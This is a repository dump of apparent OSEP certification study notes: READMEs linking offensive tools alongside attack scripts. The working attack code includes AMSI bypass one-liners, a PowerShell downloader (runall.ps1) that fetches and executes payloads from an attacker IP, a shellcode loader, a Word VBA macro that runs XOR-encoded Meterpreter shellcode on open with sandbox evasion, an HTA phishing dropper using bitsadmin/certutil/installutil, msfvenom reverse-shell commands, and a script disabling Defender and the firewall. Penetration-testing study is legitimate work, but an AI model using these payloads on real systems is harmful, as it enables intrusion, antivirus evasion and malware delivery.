├── .gitignore
├── images
    ├── SliverCLM.png
    └── UnmanagedPS.png
├── AMSI
    ├── 2.txt
    ├── 1.txt
    ├── README.md
    ├── runall.ps1
    └── shellcoderunner.ps1
├── Tunneling
    └── README.md
├── Active Directory
    ├── LAPS
    │   └── README.md
    ├── Relay
    │   └── README.md
    ├── README.md
    └── Delegation
    │   └── README.md
├── Csharp Everything
    └── README.md
├── EveryBox
    ├── README.md
    └── dropav.ps1
├── MSSQL
    └── README.md
├── Seimpersonateprivilege
    └── README.md
├── Phishing
    ├── HTA
    │   ├── generateHTA.py
    │   └── README.md
    └── Word
    │   ├── README.md
    │   ├── shellcode_runner.vba
    │   └── msfhex_inject.vba
├── Anti-Virus
    └── README.md
├── CLM bypass
    └── README.md
└── README.md


/.gitignore:
--------------------------------------------------------------------------------
1 | .DS_Store


--------------------------------------------------------------------------------
/images/SliverCLM.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/beauknowstech/OSEP-Everything/HEAD/images/SliverCLM.png


--------------------------------------------------------------------------------
/images/UnmanagedPS.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/beauknowstech/OSEP-Everything/HEAD/images/UnmanagedPS.png


--------------------------------------------------------------------------------
/AMSI/2.txt:
--------------------------------------------------------------------------------
1 | $p=$l.GetFields('NonPublic,Static');Foreach($v in $p) {if ($v.Name -like "*Failed") {$z=$v}};$z.SetValue($null,$true)
2 | 


--------------------------------------------------------------------------------
/AMSI/1.txt:
--------------------------------------------------------------------------------
1 | $o=[Ref].Assembly.GetTypes();Foreach($x in $o) {if ($x.Name -like "*iUtils") {$l=$x}};$p=$l.GetFields('NonPublic,Static')
2 | 


--------------------------------------------------------------------------------
/Tunneling/README.md:
--------------------------------------------------------------------------------
1 | # Tunneling
2 | proxychains is slow and dies easily. Use [ligolo-ng](https://github.com/nicocha30/ligolo-ng) instead. Many tutorials online but I like this one:
3 | https://www.stationx.net/how-to-use-ligolo-ng/
4 | 
5 | 


--------------------------------------------------------------------------------
/Active Directory/LAPS/README.md:
--------------------------------------------------------------------------------
 1 | # LAPS
 2 | 
 3 | 
 4 | https://github.com/leoloobeek/LAPSToolkit/
 5 | 
 6 | https://github.com/swisskyrepo/SharpLAPS
 7 | 
 8 | 
 9 | Metasploit:
10 | use post/windows/gather/credentials/enum_laps
11 | 
12 | NetExec:
13 | netexec LDAP has a LAPS module. Use `-M laps`


--------------------------------------------------------------------------------
/Csharp Everything/README.md:
--------------------------------------------------------------------------------
 1 | # CSHARP collections
 2 | 
 3 | https://github.com/Flangvik/SharpCollection/
 4 | 
 5 | https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
 6 | 
 7 | 
 8 | https://github.com/boh/RedCsharp
 9 | 
10 | 
11 | https://github.com/S3cur3Th1sSh1t/PowerSharpPack
12 | 
13 | Yes I'm counting powersharppack even though its powershell
14 | 
15 | https://github.com/Aetsu/OffensivePipeline/tree/main
16 | 
17 | 


--------------------------------------------------------------------------------
/Active Directory/Relay/README.md:
--------------------------------------------------------------------------------
 1 | # Relay resources
 2 | 
 3 | `impacket-ntlmrelayx`
 4 | 
 5 | https://github.com/p0dalirius/Coercer
 6 | 
 7 | https://gritters.medium.com/responder-and-ntlmrelay-cbaf4bb71df3
 8 | 
 9 | [MSSqlPwner](/MSSQL/README.md) has an ntlm-relay function that can be used with ntlmrelayx
10 | 
11 | Check the different `-relay-method` 
12 | 
13 | https://github.com/ScorpionesLabs/MSSqlPwner?tab=readme-ov-file#functionalities
14 | 
15 | 


--------------------------------------------------------------------------------
/EveryBox/README.md:
--------------------------------------------------------------------------------
 1 | # Everybox
 2 | Stuff I ran on every box
 3 | 
 4 | ## dropav.ps1
 5 | My own version of https://github.com/emanuelepicas/OSEP/blob/master/AV-Evasion/DisableSecuritySettings/dropAV_AND_More.ps1
 6 | Rolls back AV definitions, disable AV functions, disables the firewall, allows RDP and PTH for RDP. 
 7 | 
 8 | ### Host with gup
 9 | https://github.com/beauknowstech/gup
10 | Or `python3 -m http.server` but I like gup better. Obviously. I made it to be better.
11 | 
12 | 


--------------------------------------------------------------------------------
/MSSQL/README.md:
--------------------------------------------------------------------------------
 1 | # MSSQL
 2 | 
 3 | https://github.com/ScorpionesLabs/MSSqlPwner
 4 | 
 5 | MSSqlPwner is amazing. Be familiar with all the functionalities listed on the github. As well as the authentication methods.
 6 | 
 7 | https://github.com/skahwah/SQLRecon
 8 | 
 9 | I think sqlrecon is built into sliver as well
10 | 
11 | https://github.com/NetSPI/PowerUpSQL
12 | 
13 | 
14 | https://github.com/fortra/impacket/blob/master/examples/mssqlclient.py
15 | 
16 | 
17 | Learning:
18 | 
19 | https://mayfly277.github.io/posts/GOADv2-pwning-part7/


--------------------------------------------------------------------------------
/Seimpersonateprivilege/README.md:
--------------------------------------------------------------------------------
 1 | # Seimpersonateprivilege
 2 | Windows privesc to system
 3 | 
 4 | ## meterpreter
 5 | If you have a meterpreter shell just use 
 6 | 
 7 | `getsystem -t 5` or `getsystem -t 6`
 8 | 
 9 | Which is https://github.com/itm4n/PrintSpoofer and https://github.com/zcgonvh/EfsPotato respectively 
10 | 
11 | 
12 | https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/windows/escalate/getsystem.md
13 | 
14 | 
15 | ## Others
16 | 
17 | If not using a meterpreter shell then use https://github.com/BeichenDream/GodPotato or it's varient https://github.com/lypd0/DeadPotato
18 | 


--------------------------------------------------------------------------------
/AMSI/README.md:
--------------------------------------------------------------------------------
 1 | # AMSI bypass
 2 | ## Beau's lil two step
 3 | 
 4 | To bypass AMSI I would run runall.ps1 which runs 1.txt and 2.txt and then a .ps1 of your choice in this case 
 5 | https://github.com/chvancooten/OSEP-Code-Snippets/blob/main/Simple%20Shellcode%20Runner/Simple%20Shellcode%20Runner.ps1 which I renamed to shellcoderunner.ps1.
 6 | It has it's own AMSI bypass but my "lil two step" as I call it, works on current versions of windows at least as of time of writing. 
 7 | 
 8 | ### Host with gup
 9 | https://github.com/beauknowstech/gup
10 | Or `python3 -m http.server` but I like gup better. Obviously. I made it to be better.


--------------------------------------------------------------------------------
/AMSI/runall.ps1:
--------------------------------------------------------------------------------
 1 | #powershell -c IEX (New-Object Net.WebClient).DownloadString('http://192.168.x.x/runall.ps1')
 2 | 
 3 | 
 4 | $ip = '192.168.x.x'
 5 | 
 6 | #amsi bypass
 7 | iex (New-Object Net.WebClient).DownloadString("http://$ip/1.txt")
 8 | iex (New-Object Net.WebClient).DownloadString("http://$ip/2.txt")
 9 | $is64ps = [Environment]::Is64BitProcess
10 | iex (New-Object Net.WebClient).DownloadString("http://$ip/is64ps=$is64ps")
11 | $user = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
12 | iex (New-Object Net.WebClient).DownloadString("http://$ip/username=$user")
13 | #iex (New-Object Net.WebClient).DownloadString("http://$ip/basicrunner.ps1")
14 | #Usually works best:
15 | iex (New-Object Net.WebClient).DownloadString("http://$ip/shellcoderunner.ps1")
16 | 


--------------------------------------------------------------------------------
/Phishing/HTA/generateHTA.py:
--------------------------------------------------------------------------------
 1 | import argparse
 2 | # from emvee_nl on discord
 3 | def generate_hta(js_file, out_file):
 4 |     with open(js_file, 'r') as f:
 5 |         js_data = f.read()
 6 | 
 7 |     template = '''
 8 | <html>
 9 | <head>
10 | <script language="JScript">
11 | {}
12 | </script>
13 | </head>
14 | <body>
15 | <script language="JScript">
16 | self.close();
17 | </script>
18 | </body>
19 | </html>
20 | '''
21 | 
22 |     with open(out_file, 'w') as f:
23 |         f.write(template.format(js_data))
24 | 
25 | if __name__ == '__main__':
26 |     parser = argparse.ArgumentParser()
27 |     parser.add_argument('--in', dest='js_file', required=True, help='Input JS file')
28 |     parser.add_argument('--out', dest='out_file', required=True, help='Output HTA file')
29 |     args = parser.parse_args()
30 | 
31 |     generate_hta(args.js_file, args.out_file)


--------------------------------------------------------------------------------
/Anti-Virus/README.md:
--------------------------------------------------------------------------------
 1 | # Anti-Virus stuff
 2 | 
 3 | ### Resources:
 4 | https://book.ghanim.no/?p=2698#test-payload-against-av
 5 | 
 6 | https://offensivedefence.co.uk/posts/threatcheck-ghidra/
 7 | 
 8 | https://medium.com/@luisgerardomoret_69654/obfuscating-a-mimikatz-downloader-to-evade-defender-2024-b3a9098f0ae7
 9 | 
10 | 
11 | ### The ones I use regularly
12 | https://github.com/TheWover/donut
13 | 
14 | https://github.com/Tylous/ScareCrow
15 | 
16 | https://github.com/XenocodeRCE/neo-ConfuserEx
17 | 
18 | https://www.youtube.com/watch?v=y_ma9cLFdmY
19 | 
20 | 
21 | https://github.com/rasta-mouse/ThreatCheck
22 | 
23 | 
24 | ### The ones I haven't used
25 | 
26 | https://github.com/almounah/superdeye
27 | 
28 | https://github.com/JoelGMSec/Invoke-Stealth
29 | 
30 | https://github.com/mgeeky/ProtectMyTooling
31 | 
32 | https://github.com/tokyoneon/Chimera
33 | 
34 | https://github.com/Aetsu/OffensivePipeline/
35 | 
36 | https://github.com/h4wkst3r/InvisibilityCloak
37 | 
38 | https://github.com/okankurtuluss/ShadowInjector/
39 | 
40 | https://github.com/hasherezade/exe_to_dll
41 | 
42 | https://github.com/govolution/avet
43 | 
44 | https://github.com/iilegacyyii/Shellcrypt
45 | 
46 | https://github.com/nickvourd/Supernova?tab=readme-ov-file#features
47 | 
48 | 
49 | 
50 | 
51 | 


--------------------------------------------------------------------------------
/Active Directory/README.md:
--------------------------------------------------------------------------------
 1 | # Active Directory
 2 | AD is a key component of OSEP. These are some of my favorite tools.
 3 | 
 4 | ## General AD and cheat sheets
 5 | https://github.com/infosecn1nja/AD-Attack-Defense
 6 | 
 7 | https://gatari.dev/posts/the-art-of-exploiting-ad-from-linux/#windows---linux-interoperability
 8 | 
 9 | 
10 | 
11 | 
12 | 
13 | ### adPEAS
14 | 
15 | https://github.com/61106960/adPEAS/blob/main/adPEAS-Light.ps1
16 | 
17 | adPEAS does some quick checks similar to lipeas/winpeas.
18 | The light version does not run a bloodhound collection.
19 | 
20 | ### Impacket
21 | 
22 | https://www.kali.org/tools/impacket-scripts/
23 | 
24 | Impacket has a LOT of scripts that you will find useful. 
25 | 
26 | ### Netexec
27 | 
28 | https://www.netexec.wiki/
29 | 
30 | https://github.com/Pennyw0rth/NetExec
31 | 
32 | 
33 | ### GOAD
34 | 
35 | Game of Active Directory. purposefully vunerable Active Directory that can be used for practice
36 | 
37 | https://github.com/Orange-Cyberdefense/GOAD
38 | 
39 | https://github.com/lkarlslund/deploy-goad
40 | 
41 | I personally did not use this but many have found it useful. 
42 | 
43 | ### Bloodhound
44 | 
45 | By now you should know about this
46 | 
47 | https://github.com/SpecterOps/BloodHound
48 | 
49 | 
50 | 
51 | 
52 | 
53 | 
54 | ### Others
55 | https://wadcoms.github.io/
56 | 
57 | https://www.n00py.io/2020/12/alternative-ways-to-pass-the-hash-pth/
58 | 


--------------------------------------------------------------------------------
/CLM bypass/README.md:
--------------------------------------------------------------------------------
 1 | # CLM bypass
 2 | Both Sliver and Meterpreter have built in CLM bypass modules
 3 | 
 4 | ### Sliver:
 5 | 
 6 | `sharpsh -- -c $ExecutionContext.SessionState.LanguageMode`
 7 | ![SliverCLM](../images/SliverCLM.png?raw=true "Sliver CLM bypass")
 8 | 
 9 | 
10 | 
11 | ### Meterpreter:
12 | ```powershell
13 | meterpreter > load powershell
14 | meterpreter > powershell_execute $ExecutionContext.SessionState.LanguageMode
15 | [+] Command execution completed:
16 | FullLanguage
17 | ```
18 | 
19 | 
20 | ### UnmanagedPowerShell
21 | https://github.com/mmnoureldin/UnmanagedPowerShell
22 | 
23 | load powershell may not work if AV is still on. UnmanagedPowershell should work. AND it has built in PowerView, PowerUp, PowerUpSQL, and Powermad. 
24 | 
25 | Use donut as shown in the video from the repo to generate the shellcode.
26 | 
27 | `./donut -i /tmp/UnmanagedPowerShell.exe -o /home/kali/tools/Windows/UnmanagedPS.bin`
28 | 
29 | In meterpreter:
30 | ```
31 | bg
32 | use post/windows/manage/shellcode_inject
33 | 
34 | set CHANNELIZED true
35 | set INTERACTIVE true
36 | set session X
37 | set shellcode /home/kali/tools/Windows/UnmanagedPS.bin
38 | 
39 | run
40 | ```
41 | ![Unmanaged Powershell](../images/UnmanagedPS.png?raw=true "Unmanaged Powershell")
42 | 
43 | ###
44 | Other projects to check out
45 | 
46 | https://github.com/beauknowstech/FullBypass
47 | 
48 | https://github.com/calebstewart/bypass-clm
49 | 
50 | https://github.com/n3rada/powerspace
51 | 
52 | https://github.com/padovah4ck/PSByPassCLM


--------------------------------------------------------------------------------
/Active Directory/Delegation/README.md:
--------------------------------------------------------------------------------
 1 | # Delegation
 2 | 
 3 | Delegation is one of the subjects that I like to know how to exploit using both linux and Windows.
 4 | 
 5 | Linux:
 6 | 
 7 | `impacket-rbcd` 
 8 | 
 9 | Windows:
10 | 
11 | https://github.com/GhostPack/Rubeus
12 | 
13 | ## Unconstrained
14 | 
15 | https://www.guidepointsecurity.com/blog/delegating-like-a-boss-abusing-kerberos-delegation-in-active-directory/
16 | 
17 | Bloodhound: 
18 | 
19 | `MATCH (c:Computer {unconstraineddelegation:true}) RETURN c`
20 | 
21 | Netexec ldap has `--trusted-for-delegation`
22 | 
23 | adPEAS will also check for unconstrained delegation.
24 | 
25 | https://www.thehacker.recipes/ad/movement/kerberos/delegations/unconstrained
26 | 
27 | 
28 | ## RBCD
29 | 
30 | https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/constrained-delegation
31 | 
32 | Meterpreter:
33 | 
34 | `auxiliary/admin/ldap/rbcd`
35 | 
36 | 
37 | In powerview do 
38 | `Get-DomainComputer -TrustedToAuth`
39 | 
40 | `Get-NetComputer -TrustedToAuth | select samaccountname,msds-allowedtodelegateto | ft`
41 | 
42 | Same with user
43 | 
44 | Look at the cn value (name of the computer) and the msds-allowedtodeledateto. 
45 | 
46 | 
47 | https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution
48 | 
49 | https://luemmelsec.github.io/S4fuckMe2selfAndUAndU2proxy-A-low-dive-into-Kerberos-delegations/
50 | 
51 | 
52 | https://mayfly277.github.io/posts/GOADv2-pwning-part10/
53 | 
54 | 
55 | https://www.youtube.com/watch?v=DVw9g7w4qu8&t=296s
56 | 
57 | 


--------------------------------------------------------------------------------
/Phishing/Word/README.md:
--------------------------------------------------------------------------------
 1 | # Word macros
 2 | ### Process hollowing
 3 | Process hollowing that also works on 32 bit:
 4 | https://gist.github.com/Mayfly277/6edbcf3be63921b5071183e1cfdb3ea8
 5 | 
 6 | Your payload size will be shown in the output of your msfvenom command. Make sure to put that in on line 162. 
 7 | 
 8 | 
 9 | Original 64 bit version:
10 | https://github.com/ColeHouston/word-vba-process-hollowing/blob/main/macro.vb
11 | 
12 | 
13 | ### msfhex_inject.vba
14 | 32 bit only
15 | Hosts the shellcode externally to bypass AV
16 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.xx.xxx LPORT=4444 EXITFUNC=thread -f hex > shellcode.txt
17 | Host with https://github.com/beauknowstech/gup or `python3 -m http.server`
18 | 
19 | make sure to change the IP on line 87
20 | 
21 | 
22 | ### shellcode_runner.vba
23 | Converted https://arttoolkit.github.io/wadcoms/ShellcodeRunner-VBA/ to 32 bit.
24 | 
25 | 
26 | ## Other resources:
27 | 
28 | https://github.com/S3cur3Th1sSh1t/OffensiveVBA/tree/main/src
29 | 
30 | https://github.com/hackinaggie/OSEP-Tools-v2/tree/main/Macros
31 | 
32 | https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/
33 | 
34 | https://www.depthsecurity.com/blog/obfuscating-malicious-macro-enabled-word-docs/
35 | 
36 | https://www.youtube.com/watch?v=KeSRGjnTdSc
37 | 
38 | https://secureyourit.co.uk/wp/2019/05/10/dynamic-microsoft-office-365-amsi-in-memory-bypass-using-vba/
39 | 
40 | https://medium.com/@luisgerardomoret_69654/obfuscating-office-macros-to-evade-defender-468606f5790c
41 | 
42 | https://github.com/Inf0secRabbit/BadAssMacros
43 | 
44 | https://github.com/JohnWoodman/VBA-Macro-Reverse-Shell/blob/main/VBA-Reverse-Shell.vba
45 | 
46 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # OSEP-Everything
 2 | Everything from my OSEP study.
 3 | 
 4 | Not fully complete, still adding stuff as I go
 5 | 
 6 | I would advise going through the OSEP study material and learning how to do things the way they teach in the course. Then use some of these tools to learn how to do it faster. 
 7 | 
 8 | ## [Active Directory](/Active%20Directory/)
 9 | Tools for AD enumeration and exploitations
10 | ### [Delegation](/Active%20Directory/Delegation/)
11 | Unconstrained, Constrained, Resource Based Constrained.
12 | ### [LAPS](/Active%20Directory/LAPS/)
13 | LAPS stuff
14 | 
15 | ### [Relay](/Active%20Directory/Relay/)
16 | Relay stuff
17 | 
18 | ## [AMSI](/AMSI/)
19 | Contiains my AMSI bypass
20 | 
21 | ## [Anti-Virus](/Anti-Virus/)
22 | Tools for AV
23 | 
24 | ##  [CLM bypass](/CLM%20bypass/)
25 | Sliver and Meterpreter have built in bypassess. Including one more for when defender is still on. And then a backup.
26 | 
27 | ## [CSharp Everything](/Csharp%20Everything/)
28 | Collections of CSharp stuff
29 | 
30 | ## [EveryBox](/EveryBox/)
31 | These are things I run on every box. 
32 | 
33 | ## [MSSQL](/MSSQL/)
34 | MSSQL stuff
35 | 
36 | ## [Phishing](/Phishing/)
37 | [HTA](/Phishing/HTA/) and [Word](/Phishing/Word/) for phishing purposes.
38 | 
39 | ### [HTA](/Phishing/HTA/)
40 | 2 that worked for me.
41 | 
42 | ### [Word](/Phishing/Word/)
43 | 3 32bit and one 64 bit vba macros that bypass current AV.
44 | 
45 | ## [Tunneling](/Tunneling/)
46 | Use https://github.com/nicocha30/ligolo-ng
47 | 
48 | 
49 | ## Other OSEP github resources in no particular order
50 | 
51 | https://github.com/In3x0rabl3/OSEP/blob/main/osep_reference.md
52 | 
53 | https://github.com/hackinaggie/OSEP-Tools-v2
54 | 
55 | https://github.com/timip/OSEP
56 | 
57 | https://github.com/chvancooten/OSEP-Code-Snippets
58 | 
59 | https://github.com/In3x0rabl3/OSEP
60 | 
61 | https://github.com/0xVavaldi/OSEP-CyberChef-Recipes
62 | 
63 | 


--------------------------------------------------------------------------------
/Phishing/HTA/README.md:
--------------------------------------------------------------------------------
 1 | # HTA
 2 | ### SuperSharpShooter
 3 | https://github.com/SYANiDE-/SuperSharpShooter
 4 | The original sharpshooter no longer works. 
 5 | 
 6 | `msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.49.xxx LPORT=443 -e x64/xor_dynamic  -b '\\x00\\x0a\\x0d' -f raw  > rawsc.bin`
 7 | 
 8 | NOTE: As of now supersharpshooter doesn't work with the --payload of hta. You have to do payload js and the put it in an hta with the script provided.
 9 | 
10 | `./SuperSharpShooter.py --stageless --dotnetver 4 --rawscfile ~/OSEP/rawsc.bin --payload js --output test`
11 | 
12 | Generate HTA python script from [@emvee_nl](https://github.com/emvee-nl):
13 | 
14 | generateHTA.py
15 | 
16 | python3 generateHTA.py --in test.js --out test.hta
17 | 
18 | OR just paste in the js into the .hta code manually
19 | 
20 | ```
21 | <html>
22 | <head>
23 | <script language="JScript">
24 | **CONTENT OF TEST.JS HERE**
25 | </script>
26 | </head>
27 | <body>
28 | <script language="JScript">
29 | self.close();
30 | </script>
31 | </body>
32 | </html>
33 | ```
34 | 
35 | ## Certutil
36 | I first saw this method on this youtube video:
37 | https://www.youtube.com/watch?v=63eE_DYrmvc
38 | 
39 | 
40 | https://github.com/chvancooten/OSEP-Code-Snippets/tree/main/AppLocker%20Bypass%20PowerShell%20Runspace
41 | 
42 | Compile this but with the correct IP and powershell stuff. Use certutil to encode it
43 | `certutil.exe -encode .\AppLocker.exe enc.txt`
44 | 
45 | Put enc.txt in the same folder as your ps1 payload.
46 | 
47 | Then make a cert.hta file with these contents:
48 | (And obviously change the IP address)
49 | ```
50 | <html>
51 | <head>
52 | <script language="JScript">
53 | var shell = new ActiveXObject("WScript.Shell");
54 | var re = shell.Run("powershell -windowstyle hidden bitsadmin /Transfer newjob3 http://192.168.45.223/installrev.txt c:\windows\tasks\enc.txt;certutil -decode c:\windows\tasks\enc.txt c:\windows\tasks\b.exe;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\windows\tasks\b.exe")
55 | </script>
56 | </head>
57 | <body>
58 | <script language="JScript">
59 | self.close();
60 | </script>
61 | </body>
62 | </html>
63 | ```


--------------------------------------------------------------------------------
/EveryBox/dropav.ps1:
--------------------------------------------------------------------------------
 1 | # (New-Object System.Net.WebClient).DownloadString("http://192.168.XXX.XXX/dropAV.ps1") | IEX
 2 | # irm http://192.168.x.x/dropav.ps1 | IEX
 3 | # Slightly modified from https://github.com/emanuelepicas/OSEP/blob/master/AV-Evasion/DisableSecuritySettings/dropAV_AND_More.ps1
 4 | 
 5 | # Roll back definitions
 6 | cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -removedefinitions -all
 7 | 
 8 | 
 9 | # Disable Windows Defender Real-Time Monitoring
10 | Set-MpPreference -DisableRealtimeMonitoring $true
11 | 
12 | # Disable various Windows Defender protection features
13 | Set-MpPreference -DisableIOAVProtection $true
14 | Set-MpPreference -DisablePrivacyMode $true
15 | Set-MpPreference -DisableIntrusionPreventionSystem $true
16 | Set-MpPreference -DisableScriptScanning $true
17 | 
18 | # Disable Cloud-delivered Protection
19 | Set-MpPreference -MAPSReporting Disabled
20 | 
21 | # Disable Automatic Sample Submission
22 | Set-MpPreference -SubmitSamplesConsent NeverSend
23 | 
24 | #Disable Real-time Protection
25 | Set-MpPreference -DisableAutoExclusions $true
26 | 
27 | #Configure Quarantine Behavior
28 | Set-MpPreference -PUAProtection 0
29 | 
30 | 
31 | New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin  -Value 0
32 | #may have to run manually in cmd:
33 | reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
34 | 
35 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
36 | 
37 | 
38 | # Disable Windows Firewall for all profiles
39 | Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
40 | 
41 | # Optionally disable Windows Defender completely (very cautious use recommended)
42 | # Disable-WindowsOptionalFeature -Online -FeatureName Windows-Defender-Features
43 | 
44 | # Function to check the status of Windows Defender settings
45 | function Check-DefenderStatus {
46 |     Get-MpPreference
47 | }
48 | 
49 | # Call the function to output the current status of Defender settings
50 | Check-DefenderStatus
51 | 
52 | # Reminder message
53 | Write-Host "All security settings have been disabled. Ensure to re-enable after testing." -ForegroundColor Red
54 | 


--------------------------------------------------------------------------------
/Phishing/Word/shellcode_runner.vba:
--------------------------------------------------------------------------------
 1 | ' 32-bit version of https://arttoolkit.github.io/wadcoms/ShellcodeRunner-VBA/
 2 | ' Converted to 32-bit by https://github.com/beauknowstech
 3 | Private Declare Function VirtualAlloc Lib "kernel32" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
 4 | Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal lDestination As Long, ByRef sSource As Any, ByVal lLength As Long) As Long
 5 | Private Declare Function CreateThread Lib "kernel32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As Long, ThreadParameter As Long, ByVal CreateFlags As Long, ByRef ThreadId As Long) As Long
 6 | Private Declare Function Sleep Lib "kernel32" (ByVal mili As Long) As Long
 7 | Private Declare Function FlsAlloc Lib "kernel32" (ByVal lpCallback As Long) As Long
 8 | 
 9 | Sub Document_Open()
10 |     ShellcodeRunner
11 | End Sub
12 | 
13 | Sub AutoOpen()
14 |     ShellcodeRunner
15 | End Sub
16 | 
17 | Function ShellcodeRunner()
18 |     Dim buf As Variant
19 |     Dim tmp As Long
20 |     Dim addr As Long
21 |     Dim counter As Long
22 |     Dim data As Long
23 |     Dim res As Long
24 |     Dim dream As Integer
25 |     Dim before As Date
26 |     Dim t As Date
27 | 
28 |     ' Check if we're in a sandbox by calling a rarely emulated API
29 |     If IsNull(FlsAlloc(tmp)) Then
30 |         Exit Function
31 |     End If
32 | 
33 |     ' Sleep to evade in-memory scan + check if the emulator did not fast-forward through the sleep instruction
34 |     dream = Int((1500 * Rnd) + 2000)
35 |     before = Now()
36 |     Sleep (dream)
37 |     If DateDiff("s", t, Now()) < dream Then
38 |         Exit Function
39 |     End If
40 | 
41 |     ' msfvenom -p windows/meterpreter/reverse_https LHOST=172.16.240.178 LPORT=443 EXITFUNC=thread -f vbapplication --encrypt xor --encrypt-key a
42 |     buf = Array(157, 137, 238, 97, 97, 97, 1, 80, ...)
43 | 
44 |     ' XOR-decrypt the shellcode
45 |     For i = 0 To UBound(buf)
46 |         buf(i) = buf(i) Xor Asc("a")
47 |     Next i
48 | 
49 |     ' &H3000 = MEM_COMMIT | MEM_RESERVE
50 |     ' &H40 = PAGE_EXECUTE_READWRITE
51 |     addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
52 | 
53 |     For counter = LBound(buf) To UBound(buf)
54 |         data = buf(counter)
55 |         res = RtlMoveMemory(addr + counter, data, 1)
56 |     Next counter
57 | 
58 |     res = CreateThread(0, 0, addr, 0, 0, 0)
59 | End Function
60 | 


--------------------------------------------------------------------------------
/AMSI/shellcoderunner.ps1:
--------------------------------------------------------------------------------
 1 | #https://github.com/chvancooten/OSEP-Code-Snippets/blob/main/Simple%20Shellcode%20Runner/Simple%20Shellcode%20Runner.ps1
 2 | 
 3 | # Compact AMSI bypass
 4 | [Ref].Assembly.GetType('System.Management.Automation.Amsi'+[char]85+'tils').GetField('ams'+[char]105+'InitFailed','NonPublic,Static').SetValue($null,$true)
 5 | 
 6 | # Shellcode loader >:]
 7 | function LookupFunc {
 8 |     Param ($moduleName, $functionName)
 9 |     $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
10 |     Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].
11 |     Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
12 |     $tmp=@()
13 |     $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
14 |     return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null,
15 |     @($moduleName)), $functionName))
16 | }
17 | 
18 | function getDelegateType {
19 |     Param (
20 |     [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
21 |     [Parameter(Position = 1)] [Type] $delType = [Void]
22 |     )
23 |     $type = [AppDomain]::CurrentDomain.
24 |     DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
25 |     [System.Reflection.Emit.AssemblyBuilderAccess]::Run).
26 |     DefineDynamicModule('InMemoryModule', $false).
27 |     DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',
28 |     [System.MulticastDelegate])
29 |     $type.
30 |     DefineConstructor('RTSpecialName, HideBySig, Public',
31 |     [System.Reflection.CallingConventions]::Standard, $func).
32 |     SetImplementationFlags('Runtime, Managed')
33 |     $type.
34 |     DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).
35 |     SetImplementationFlags('Runtime, Managed')
36 |     return $type.CreateType()
37 | }
38 | 
39 | # Allocate executable memory
40 | $lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc), 
41 |   (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, 0x3000, 0x40)
42 | 
43 | # Copy shellcode to allocated memory
44 | # msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.67 LPORT=443 EXITFUNC=thread -f powershell
45 | # I got it to work better with windows/x64/meterpreter/reverse_https
46 | # msfvenom -p windows/x64/meterpreter/reverse_https LHOST=tun0 LPORT=443 EXITFUNC=thread -f powershell
